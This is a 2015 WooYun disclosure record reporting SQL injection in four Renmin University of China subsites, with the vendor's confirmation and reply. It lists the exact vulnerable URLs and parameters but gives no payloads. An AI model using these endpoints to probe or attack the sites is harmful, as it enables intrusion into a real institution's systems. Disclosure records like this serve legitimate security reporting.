
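Vulnerability summary

Bug ID: wooyun-2015-0146534

Title: Renmin University of China bundled injection vulnerabilities #4 sites (bundled)

Vendor: Renmin University of China

Author: AuGe

Submitted: 2015-10-14 10:03

Fixed: 2015-11-28 10:54

Published: 2015-11-28 10:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]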



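Vulnerability details

Disclosure status:

2015-10-14: Details reported to the vendor; awaiting vendor handling
2015-10-14: Vendor confirmed; details disclosed to the vendor only
2015-10-24: Details disclosed to core white hats and experts in related fields
2015-11-03: Details disclosed to regular white hats
2015-11-13: Details disclosed to intern white hats
2015-11-28: Details disclosed to the public

Brief description:

As the title says. Can bundled reports please not be routed through the small-vendor process?

Detailed description:

Injection in 4 subsites, bundled

Proof of vulnerability:

#SQL
Injection URLs: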
1.http://iss.ruc.edu.cn/photo_info.php?sort=4
2.http://cdi.ruc.edu.cn/read.asp?id=217
3.http://0101.ruc.edu.cn/member/index.php?uid=tongdengxueli
4.http://confucian.ruc.edu.cn/jgsz.php?cid=28


Site 1 (screenshots: 1.jpg, 1a.jpg)

Site 2 (screenshot: 2.jpg)

Site 3 (screenshot: 3.jpg)

Site 4 (screenshot: 4.jpg)




Remediation:

Filter input.

Copyright notice: when reposting, please credit the source AuGe@WooYun


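Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-10-14 10:53

Vendor reply:

The administrators of the affected websites have been notified to handle the issue.

Latest status:

None yet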

